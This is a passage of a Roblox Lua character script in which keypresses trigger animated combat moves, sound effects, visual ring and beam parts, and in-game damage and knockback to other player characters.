  3710. P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,0.25,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(20,50)))
  3711. local P = P:Clone()
  3712. CParts[#CParts+1] = {P,tick()}
  3713. P.Parent = char
  3714. Pos = CFrame.new(Pos)*(v.CFrame-v.Position)*CFrame.new(-v.Size.X,0,0)
  3715. Pos = Pos.p
  3716. P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,0.25,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,-20)))
  3717. if LastPos ~= nil then
  3718. local P = P:Clone()
  3719. CParts[#CParts+1] = {P,tick()}
  3720. P.Parent = char
  3721. P.BrickColor = BrickColor.new("Really black")
  3722. Pos = CFrame.new(Pos)*(v.CFrame-v.Position)*CFrame.new(v.Size.X/2,0,0)
  3723. Pos = Pos.p
  3724. local CFr = (CFrame.new(Pos)*(v.CFrame-v.Position))-Vector3.new(0,0.4,0)
  3725. P.Size = Vector3.new(v.Size.X-0.25,1,(CFr.p-LastPos.p).Magnitude+0.25)
  3726. --P.Velocity = Vector3.new(0,-1000,0)
  3727. P.CFrame = CFrame.new(CFr.p,LastPos.p)*CFrame.new(0,0,-((CFr.p-LastPos.p).Magnitude+0.25)/2)
  3728. end
  3729. LastPos = (CFrame.new(Pos)*(v.CFrame-v.Position))-Vector3.new(0,0.4,0)
  3730. end
  3731. end
  3732. end
  3733. if BREAKIT then break end
  3734. wait(0.002)
  3735. end
  3736. for i,v in pairs(Rocks) do
  3737. CParts[#CParts+1] = {v,tick()}
  3738. end
  3739. for i,v in pairs(Parts) do
  3740. v:Destroy()
  3741. end
  3742. Parts = nil
  3743. while true do
  3744. local t = tick()
  3745. local p = nil
  3746. for i,v in pairs(CParts) do
  3747. if t-v[2] > 4 then
  3748. v[1].Transparency = v[1].Transparency+0.05
  3749. if v[1].Transparency >= 1 then
  3750. v[1]:Destroy()
  3751. CParts[i] = nil
  3752. end
  3753. end
  3754. p = v
  3755. end
  3756. if p == nil then break end
  3757. wait(0.002)
  3758. end
  3759. for i,v in pairs(CParts) do
  3760. v:Destroy()
  3761. end
  3762. CParts = {}
  3763. end)
  3764. for i = 1, 20 do
  3765. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.3,.8,-1) * CFrame.Angles(math.rad(50), math.rad(0), math.rad(-55)), 0.4)
  3766. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.3,.8,-1) * CFrame.Angles(math.rad(50), math.rad(0), math.rad(55)), 0.4)
  3767. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)),0.4)
  3768. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.6, 0) * CFrame.Angles(math.rad(-30), math.rad(0), 0), 0.4)
  3769. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -1, -1.4) * CFrame.Angles(math.rad(40), 0, math.rad(0)), 0.4)
  3770. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -1.6, -.9) * CFrame.Angles(math.rad(10), 0, math.rad(0)), 0.4)
  3771. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(1.4, -3.5, -7) * CFrame.Angles(math.rad(-90), math.rad(-142), math.rad(20)), 1)
  3772. if Debounces.on == false then break end
  3773. rs:wait(2)
  3774. end
  3775. if Debounces.CanAttack == false then
  3776. Debounces.CanAttack = true
  3777. Debounces.on = false
  3778. Debounces.NoIdl = false
  3779. end
  3780. end
  3781. end
  3782. end)
  3783. ----------------------------------------------------
  3784. mouse.KeyDown:connect(function(key)
  3785. if key == "e" then
  3786. larm.BrickColor = BrickColor.new("Royal purple")
  3787. rarm.BrickColor = BrickColor.new("Royal purple")
  3788. if Debounces.CanAttack == true then
  3789. Debounces.CanAttack = false
  3790. Debounces.on = true
  3791. Debounces.NoIdl = true
  3792. for i = 1, 18 do
  3793. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 1.7, 0) * CFrame.Angles(math.rad(90),math.rad(50),math.rad(90)), 0.4)
  3794. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 0.9, 0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)), 0.4)
  3795. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0) * CFrame.Angles(math.rad(-14),math.rad(0),0), 0.4)
  3796. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(0), 0), 0.4)
  3797. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.4)
  3798. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.4)
  3799. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  3800. if Debounces.on == false then break end
  3801. rs:wait(4)
  3802. end
  3803. local HandCF = CFrame.new(char.Absolution.Handle.Position - Vector3.new(0,8.8,0)) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0))
  3804. local rng = Instance.new("Part", char.Absolution.Handle)
  3805. rng.Anchored = true
  3806. rng.BrickColor = BrickColor.new("Really black")
  3807. rng.CanCollide = true
  3808. rng.FormFactor = 3
  3809. rng.Name = "Ring"
  3810. rng.Size = Vector3.new(1, 1, 1)
  3811. rng.CanCollide = false
  3812. rng.Transparency = 0.35
  3813. rng.TopSurface = 0
  3814. rng.BottomSurface = 0
  3815. rng.CFrame = HandCF
  3816. local rngm = Instance.new("SpecialMesh", rng)
  3817. rngm.MeshId = "http://www.roblox.com/asset/?id=3270017"
  3818. rngm.Scale = Vector3.new(1, 1, 2)
  3819. x = Instance.new("Sound", hed)
  3820. x.SoundId = "http://www.roblox.com/asset/?id=169445602"
  3821. x.Looped = false
  3822. x.Pitch = .7
  3823. x.Volume = 1
  3824. x1 = Instance.new("Sound", hed)
  3825. x1.SoundId = "http://www.roblox.com/asset/?id=169445602"
  3826. x1.Looped = false
  3827. x1.Pitch = .7
  3828. x1.Volume = 1
  3829. x:Play()
  3830. x1:Play()
  3831. rngto = rng.Touched:connect(function(ht)
  3832. hit = ht.Parent
  3833. if ht and hit:IsA("Model") then
  3834. if hit:FindFirstChild("Humanoid") then
  3835. if hit.Name ~= p.Name then
  3836. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  3837. Debounces.Slashed = true]]--
  3838. hit:FindFirstChild("Humanoid"):TakeDamage(4)
  3839. hit:FindFirstChild("Humanoid").PlatformStand = true
  3840. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -120
  3841. --Debounces.Slashed = false
  3842. --end
  3843. end
  3844. end
  3845. elseif ht and hit:IsA("Hat") then
  3846. if hit.Parent.Name ~= p.Name then
  3847. if hit.Parent:FindFirstChild("Humanoid") then
  3848. --[[ if Debounces.Slashing == true and Debounces.Slashed == false then
  3849. Debounces.Slashed = true]]--
  3850. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(4)
  3851. hit:FindFirstChild("Humanoid").PlatformStand = true
  3852. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -120
  3853. --Debounces.Slashed = false
  3854. end
  3855. end
  3856. end
  3857. end)
  3858. coroutine.wrap(function()
  3859. for i = 1, 60, 2 do
  3860. rngm.Scale = Vector3.new(2 + i*2, 2 + i*2, 1)
  3861. rng.Size = rngm.Scale
  3862. rng.CFrame = HandCF
  3863. rng.Transparency = i/60
  3864. wait()
  3865. end
  3866. wait()
  3867. rng:Destroy()
  3868. end)()
  3869. for i = 1, 18 do
  3870. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 0.9, 0) * CFrame.Angles(math.rad(90),math.rad(0),math.rad(90)), 0.4)
  3871. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 0.9, 0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)), 0.4)
  3872. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0) * CFrame.Angles(math.rad(-14),math.rad(0),0), 0.4)
  3873. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(0), 0), 0.4)
  3874. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.4)
  3875. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.4)
  3876. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, 0.2) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  3877. if Debounces.on == false then break end
  3878. rs:wait(2.4)
  3879. end
  3880. larm.BrickColor = BrickColor.new("Really black")
  3881. rarm.BrickColor = BrickColor.new("Really black")
  3882. x:Destroy()
  3883. x1:Destroy()
  3884. if Debounces.CanAttack == false then
  3885. Debounces.CanAttack = true
  3886. Debounces.on = false
  3887. Debounces.NoIdl = false
  3888. end
  3889. end
  3890. end
  3891. end)
  3892. ----------------------------------------------------
  3893. mouse.KeyDown:connect(function(key)
  3894. if key == "y" then
  3895. if Debounces.CanAttack == true then
  3896. Debounces.CanAttack = false
  3897. Debounces.on = true
  3898. Debounces.NoIdl = true
  3899. for i = 1, 15 do
  3900. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(30)), 0.2)
  3901. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-89)), 0.6)
  3902. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.2)
  3903. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.2)
  3904. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.2)
  3905. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.2)
  3906. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  3907. if Debounces.on == false then break end
  3908. rs:wait(2.7)
  3909. end
  3910. x = Instance.new("Sound",char)
  3911. x.SoundId = "rbxassetid://228343271"
  3912. x.Pitch = 1
  3913. x.Volume = .8
  3914. wait(.1)
  3915. x:Play()
  3916. Debounces.on = false
  3917. Debounces.Here = false
  3918. shot = shot + 1
  3919. local rng = Instance.new("Part", char)
  3920. rng.Anchored = true
  3921. rng.BrickColor = BrickColor.new("Royal purple")
  3922. rng.CanCollide = false
  3923. rng.FormFactor = 3
  3924. rng.Name = "Ring"
  3925. rng.Size = Vector3.new(1, 1, 1)
  3926. rng.Transparency = 0.35
  3927. rng.TopSurface = 0
  3928. rng.BottomSurface = 0
  3929. rng2 = rng:clone()
  3930. rng3 = rng2:clone()
  3931. rng4 = rng2:clone()
  3932. local rngm = Instance.new("SpecialMesh", rng)
  3933. rngm.MeshId = "http://www.roblox.com/asset/?id=3270017"
  3934. rngm.Scale = Vector3.new(10, 10, 1)
  3935. rngm2 = rngm:clone()
  3936. rngm2.Scale = Vector3.new(5, 5, 3)
  3937. rngm3=rngm2:clone()
  3938. rngm3.Parent = rng3
  3939. rngm3.Scale = Vector3.new(8, 8, 1)
  3940. rngm4 = rngm2:clone()
  3941. rngm4.Parent = rng4
  3942. rngm4.Scale = Vector3.new(6, 6, 1)
  3943. local bem = Instance.new("Part", char)
  3944. bem.Anchored = true
  3945. bem.BrickColor = BrickColor.new("Really black")
  3946. bem.CanCollide = false
  3947. bem.FormFactor = 3
  3948. bem.Name = "Beam" .. shot
  3949. bem.Size = Vector3.new(1, 1, 1)
  3950. bem.Transparency = 0.35
  3951. bem.TopSurface = 0
  3952. bem.BottomSurface = 0
  3953. local bemm = Instance.new("SpecialMesh", bem)
  3954. bemm.MeshType = 4
  3955. bemm.Scale = Vector3.new(1, 4, 4)
  3956. local out = Instance.new("Part", char)
  3957. out.Anchored = true
  3958. out.BrickColor = BrickColor.new("Really black")
  3959. out.CanCollide = false
  3960. out.FormFactor = 3
  3961. out.Name = "Out"
  3962. out.Size = Vector3.new(4, 4, 4)
  3963. out.Transparency = 0.35
  3964. out.TopSurface = 0
  3965. out.BottomSurface = 0
  3966. local outm = Instance.new("SpecialMesh", out)
  3967. outm.MeshId = "http://www.roblox.com/asset/?id=1033714"
  3968. outm.Scale = Vector3.new(4, 4, 4)
  3969. local bnd = Instance.new("Part", char)
  3970. bnd.Anchored = true
  3971. bnd.BrickColor = BrickColor.new("Royal purple")
  3972. bnd.CanCollide = false
  3973. bnd.FormFactor = 3
  3974. bnd.Name = "Bend"
  3975. bnd.Size = Vector3.new(1, 1, 1)
  3976. bnd.Transparency = 1
  3977. bnd.TopSurface = 0
  3978. bnd.BottomSurface = 0
  3979. local bndm = Instance.new("SpecialMesh", bnd)
  3980. bndm.MeshType = 3
  3981. bndm.Scale = Vector3.new(8, 8, 8)
  3982. out.CFrame = larm.CFrame * CFrame.new(0, -2.7, 0)
  3983. bem.CFrame = out.CFrame * CFrame.new(0, -2.5, 0) * CFrame.Angles(0, 0, math.rad(90))
  3984. bnd.CFrame = bem.CFrame * CFrame.new(0, 0, 0)
  3985. rng.CFrame = out.CFrame * CFrame.Angles(math.rad(90), 0, 0)
  3986. rng3.CFrame = rng.CFrame * CFrame.new(0, -.5, 0)
  3987. rng4.CFrame = rng.CFrame * CFrame.new(0, -1, 0)
  3988. Debounces.Shewt = true
  3989. coroutine.wrap(function()
  3990. for i = 1, 20, 0.2 do
  3991. rngm.Scale = Vector3.new(10 + i*2, 10 + i*2, 1)
  3992. rngm3.Scale = Vector3.new(8 + i*3, 8 + i*3, 1)
  3993. rngm4.Scale = Vector3.new(6 + i*4, 6 + i*4, 1)
  3994. rng.Transparency = i/20
  3995. rng3.Transparency = 1/24
  3996. rng4.Transparency = i/26
  3997. wait()
  3998. end
  3999. wait()
  4000. rng:Destroy()
  4001. end)()
  4002. if Debounces.Shewt == true then
  4003. char:WaitForChild("Beam" .. shot).Touched:connect(function(ht)
  4004. hit = ht.Parent
  4005. if hit:IsA("Model") and hit:findFirstChild("Humanoid") then
  4006. if HasntTouched(hit.Name) == true and deb == false then
  4007. deb = true
  4008. coroutine.wrap(function()
  4009. hit:FindFirstChild("Humanoid").PlatformStand = true
  4010. hit:FindFirstChild("Torso").Velocity = char.Head.CFrame.lookVector * 180
  4011. hit:FindFirstChild("Humanoid"):TakeDamage(math.random(99999999,99999999))
  4012. end)()
  4013. table.insert(Touche, hit.Name)
  4014. deb = false
  4015. end
  4016. elseif hit:IsA("Hat") and hit.Parent:findFirstChild("Humanoid") then
  4017. if HasntTouched(hit.Parent.Name) == true and deb == false then
  4018. deb = true
  4019. coroutine.wrap(function()
  4020. hit.Parent:FindFirstChild("Humanoid").PlatformStand = true
  4021. hit.Parent:FindFirstChild("Torso").Velocity = char.Head.CFrame.lookVector * 180
  4022. wait(1)
  4023. hit.Parent:FindFirstChild("Humanoid").PlatformStand = false
  4024. end)()
  4025. table.insert(Touche, hit.Parent.Name)
  4026. deb = false
  4027. for i, v in pairs(Touche) do
  4028. print(v)
  4029. end
  4030. end
  4031. end
  4032. end)
  4033. end
  4034. for i = 0, 260, 8 do
  4035. bem.Size = Vector3.new(i, 2, 2)
  4036. bem.CFrame = larm.CFrame * CFrame.new(0, -4.2 -(i/2), 0) * CFrame.Angles(0, 0, math.rad(90))
  4037. bnd.CFrame = bem.CFrame * CFrame.new(-i/2, 0, 1.2)
  4038. bnd.Size = Vector3.new(1,1,1)
  4039. bndm.Scale = Vector3.new(8,8,8)
  4040. if i % 10 == 0 then
  4041. local newRng = rng2:Clone()
  4042. newRng.Parent = char
  4043. newRng.CFrame = larm.CFrame * CFrame.new(0, -4.2-i, 0) * CFrame.Angles(math.rad(90), 0, 0)
  4044. local newRngm = rngm2:clone()
  4045. newRngm.Parent=newRng
  4046. coroutine.wrap(function()
  4047. for i = 1, 10, 0.2 do
  4048. newRngm.Scale = Vector3.new(8 + i*2, 8 + i*2, 3)
  4049. newRng.Transparency = i/10
  4050. wait()
  4051. end
  4052. wait()
  4053. newRng:Destroy()
  4054. end)()
  4055. end
  4056. wait()
  4057. end
  4058. wait()
  4059. Debounces.Shewt = false
  4060. bem:Destroy()
  4061. out:Destroy()
  4062. bnd:Destroy()
  4063. Debounces.Ready = false
  4064. for i, v in pairs(Touche) do
  4065. table.remove(Touche, i)
  4066. end
  4067. wait()
  4068. table.insert(Touche, char.Name)
  4069. Debounces.NoIdl = false
  4070. if Debounces.CanAttack == false then
  4071. Debounces.CanAttack = true
  4072. end
  4073. end
  4074. end
  4075. end)
  4076. ----------------------------------------------------
  4077. sidz = {"231917888", "231917845", "231917806"}
  4078. ptz = {0.65, 0.7, 0.75, 0.8, 0.95, 1}
  4079. mouse.KeyDown:connect(function(key)
  4080. if key == "f" then
  4081. larm.BrickColor = BrickColor.new("Royal purple")
  4082. rarm.BrickColor = BrickColor.new("Royal purple")
  4083. if Debounces.CanAttack == true then
  4084. Debounces.CanAttack = false
  4085. Debounces.on = true
  4086. Debounces.NoIdl = true
  4087. for i = 1, 20 do
  4088. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(-34)), 0.2)
  4089. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(34)), 0.2)
  4090. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, .2)*CFrame.Angles(math.rad(16),math.rad(0),0), 0.2)
  4091. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(20), math.rad(0), 0), 0.2)
  4092. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4093. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, -1.4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4094. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4095. if Debounces.on == false then break end
  4096. rs:wait(6)
  4097. end
  4098. z = Instance.new("Sound",char)
  4099. z.SoundId = "rbxassetid://"..sidz[math.random(1,#sidz)]
  4100. z.Pitch = ptz[math.random(1,#ptz)]
  4101. z.Volume = 1
  4102. z1 = Instance.new("Sound",char)
  4103. z1.SoundId = z.SoundId
  4104. z1.Pitch = z.Pitch
  4105. z1.Volume = 1
  4106. z:Play()
  4107. z1:Play()
  4108. Stomp()
  4109. for i = 1, 20 do
  4110. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 0.9, .4)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(28)), 0.3)
  4111. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 0.9, .4)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(-28)), 0.3)
  4112. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, -.2)*CFrame.Angles(math.rad(-26),math.rad(0),0), 0.3)
  4113. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, -.6) * CFrame.Angles(math.rad(-30), math.rad(0), 0), 0.3)
  4114. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(30), 0, math.rad(0)), 0.3)
  4115. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2.8, -1.4) * CFrame.Angles(math.rad(30), 0, math.rad(0)), 0.3)
  4116. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4117. if Debounces.on == false then break end
  4118. rs:wait(2.5)
  4119. end
  4120. if Debounces.CanAttack == false then
  4121. Debounces.CanAttack = true
  4122. Debounces.on = false
  4123. Debounces.NoIdl = false
  4124. larm.BrickColor = BrickColor.new("Really black")
  4125. rarm.BrickColor = BrickColor.new("Really black")
  4126. end
  4127. end
  4128. end
  4129. end)
  4130. ----------------------------------------------------
  4131. mouse.KeyDown:connect(function(key)
  4132. if key == "g" then
  4133. larm.BrickColor = BrickColor.new("Royal purple")
  4134. rarm.BrickColor = BrickColor.new("Royal purple")
  4135. if Debounces.CanAttack == true then
  4136. Debounces.CanAttack = false
  4137. Debounces.on = true
  4138. Debounces.NoIdl = true
  4139. chrg = lleg.Touched:connect(function(ht)
  4140. hit = ht.Parent
  4141. if ht and hit:IsA("Model") then
  4142. if hit:FindFirstChild("Humanoid") then
  4143. if hit.Name ~= p.Name then
  4144. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  4145. Debounces.Slashed = true]]--
  4146. hit:FindFirstChild("Humanoid"):TakeDamage(2)
  4147. hit:FindFirstChild("Humanoid").PlatformStand = true
  4148. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -70
  4149. --Debounces.Slashed = false
  4150. --end
  4151. end
  4152. end
  4153. elseif ht and hit:IsA("Hat") then
  4154. if hit.Parent.Name ~= p.Name then
  4155. if hit.Parent:FindFirstChild("Humanoid") then
  4156. --[[ if Debounces.Slashing == true and Debounces.Slashed == false then
  4157. Debounces.Slashed = true]]--
  4158. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(2)
  4159. hit:FindFirstChild("Humanoid").PlatformStand = true
  4160. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -70
  4161. --Debounces.Slashed = false
  4162. end
  4163. end
  4164. end
  4165. end)
  4166. for i = 1, 14 do
  4167. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, .9, 0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(30)), 0.2)
  4168. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.6, .9, -.4)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.2)
  4169. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, -.2)*CFrame.Angles(math.rad(0),math.rad(90),math.rad(0)), 0.2)
  4170. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(0), math.rad(-90), math.rad(0)), 0.2)
  4171. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-.8, -3, 0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(15)), 0.2)
  4172. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(15)), 0.2)
  4173. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.3, -1.1) * CFrame.Angles(math.rad(-60), math.rad(-90), math.rad(0)), 0.9)
  4174. if Debounces.on == false then break end
  4175. rs:wait(3)
  4176. end
  4177. charge()
  4178. z = Instance.new("Sound",char)
  4179. z.SoundId = "rbxassetid://200632875"
  4180. z.Volume = 1
  4181. z.Pitch = .8
  4182. z1 = Instance.new("Sound",char)
  4183. z1.SoundId = "rbxassetid://200632875"
  4184. z1.Volume = 1
  4185. z1.Pitch = .9
  4186. z:Play()
  4187. z1:Play()
  4188. wait(1)
  4189. z:Destroy()
  4190. z1:Destroy()
  4191. chrg:disconnect()
  4192. if Debounces.CanAttack == false then
  4193. Debounces.CanAttack = true
  4194. Debounces.on = false
  4195. Debounces.NoIdl = false
  4196. larm.BrickColor = BrickColor.new("Really black")
  4197. rarm.BrickColor = BrickColor.new("Really black")
  4198. end
  4199. end
  4200. end
  4201. end)
  4202. ----------------------------------------------------
  4203. pt = {0.7, 0.8, 0.9}
  4204. mouse.KeyDown:connect(function(key)
  4205. if key == "h" then
  4206. if Debounces.CanJoke == true then
  4207. Debounces.CanJoke = false
  4208. u = Instance.new("Sound")
  4209. u.SoundId = "http://www.roblox.com/asset/?id=138199573"
  4210. u.Parent = char
  4211. u.Looped = false
  4212. u.Pitch = pt[math.random(1,#pt)]
  4213. u.Volume = 1
  4214. u2 = Instance.new("Sound")
  4215. u2.SoundId = "http://www.roblox.com/asset/?id=138199573"
  4216. u2.Parent = char
  4217. u2.Looped = false
  4218. u2.Pitch = u.Pitch
  4219. u2.Volume = 1
  4220. wait(.01)
  4221. u:Play()
  4222. u2:Play()
  4223. wait(6)
  4224. u:Destroy()
  4225. u2:Destroy()
  4226. if Debounces.CanJoke == false then
  4227. Debounces.CanJoke = true
  4228. end
  4229. end
  4230. end
  4231. end)
  4232. ----------------------------------------------------
  4233. mouse.KeyDown:connect(function(key)
  4234. if key == "j" then
  4235. if Debounces.CanJoke == true then
  4236. Debounces.CanJoke = false
  4237. z = Instance.new("Sound",char)
  4238. z.SoundId = "rbxassetid://135017755"
  4239. z.Pitch = .76
  4240. z.Volume = 1
  4241. wait()
  4242. z:Play()
  4243. wait(6)
  4244. z:Destroy()
  4245. if Debounces.CanJoke == false then
  4246. Debounces.CanJoke = true
  4247. end
  4248. end
  4249. end
  4250. end)
  4251. ----------------------------------------------------
  4252. mouse.KeyDown:connect(function(key)
  4253. if key == "k" then
  4254. if Debounces.CanJoke == true then
  4255. Debounces.CanJoke = false
  4256. z = Instance.new("Sound",char)
  4257. z.SoundId = "rbxassetid://135017578"
  4258. z.Pitch = .76
  4259. z.Volume = 1
  4260. wait()
  4261. z:Play()
  4262. wait(4)
  4263. z:Destroy()
  4264. if Debounces.CanJoke == false then
  4265. Debounces.CanJoke = true
  4266. end
  4267. end
  4268. end
  4269. end)
  4270. ----------------------------------------------------
  4271. mouse.KeyDown:connect(function(key)
  4272. if key == "x" then
  4273. if Debounces.CanAttack == true then
  4274. Debounces.CanAttack = false
  4275. Debounces.NoIdl = true
  4276. Debounces.on = true
  4277. Debounces.ks = true
  4278. for i = 1, 10 do
  4279. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.2)
  4280. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.7,.9,-.5)*CFrame.Angles(math.rad(40),math.rad(0),math.rad(20)), 0.2)
  4281. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.4)*CFrame.Angles(math.rad(-26),math.rad(0),0), 0.2)
  4282. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(-10), math.rad(0), 0), 0.2)
  4283. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(0)), 0.2)
  4284. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2.7, .6) * CFrame.Angles(math.rad(-70), math.rad(0), math.rad(0)), 0.2)
  4285. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4286. if Debounces.on == false then break end
  4287. rs:wait(1)
  4288. end
  4289. z = Instance.new("Sound",hed)
  4290. z.SoundId = "rbxassetid://169445092"
  4291. z.Volume = 1
  4292. wait(0.1)
  4293. z:Play()
  4294. kik = rleg.Touched:connect(function(ht)
  4295. hit = ht.Parent
  4296. if ht and hit:IsA("Model") then
  4297. if hit:FindFirstChild("Humanoid") then
  4298. if hit.Name ~= p.Name then
  4299. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  4300. Debounces.Slashed = true]]--
  4301. if Debounces.ks==true then
  4302. z = Instance.new("Sound",hed)
  4303. z.SoundId = "rbxassetid://169380525"
  4304. z.Volume = 1
  4305. z:Play()
  4306. Debounces.ks=false
  4307. end
  4308. hit:FindFirstChild("Humanoid"):TakeDamage(2)
  4309. hit:FindFirstChild("Humanoid").PlatformStand = true
  4310. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -70
  4311. --Debounces.Slashed = false
  4312. --end
  4313. end
  4314. end
  4315. elseif ht and hit:IsA("Hat") then
  4316. if hit.Parent.Name ~= p.Name then
  4317. if hit.Parent:FindFirstChild("Humanoid") then
  4318. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  4319. Debounces.Slashed = true]]--
  4320. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(2)
  4321. hit:FindFirstChild("Humanoid").PlatformStand = true
